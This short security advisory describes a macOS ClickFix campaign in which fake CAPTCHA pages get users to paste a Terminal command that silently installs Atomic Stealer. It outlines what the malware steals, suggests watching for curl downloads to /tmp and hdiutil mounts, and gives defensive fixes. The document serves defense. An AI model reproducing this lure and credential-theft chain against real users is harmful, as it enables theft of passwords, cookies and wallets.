macOS ClickFix attack uses Terminal trick to silently install Atomic Stealer
Palo Alto's Unit 42 found a new macOS campaign that uses the ClickFix trick, a fake CAPTCHA or verification page, to get users to paste a command into Terminal. The command quietly downloads a disk image, mounts it without showing it in Finder, finds the app inside, and launches it, installing the Atomic macOS Stealer (AMOS). The malware then shows a fake system password prompt and steals browser credentials and cookies from many Chromium and Firefox-based browsers, cryptocurrency wallet data, Keychain contents, messaging app data, and documents. The single-command approach is stealthier than older campaigns that relied on the victim manually opening a downloaded image.
- Check
- Warn Mac users never to paste website-supplied commands into Terminal to pass a CAPTCHA, and watch endpoints for unexpected hdiutil mounts and curl downloads to the /tmp folder.
- Affected
- macOS users tricked by fake CAPTCHA or verification pages into running a Terminal command; crypto-wallet holders and anyone with browser-stored credentials and Keychain secrets are the main targets.
- Fix
- Train users to recognize ClickFix lures, restrict or monitor Terminal use on managed Macs, deploy endpoint protection that detects AMOS behavior, and store crypto wallets and secrets in hardware-backed protection.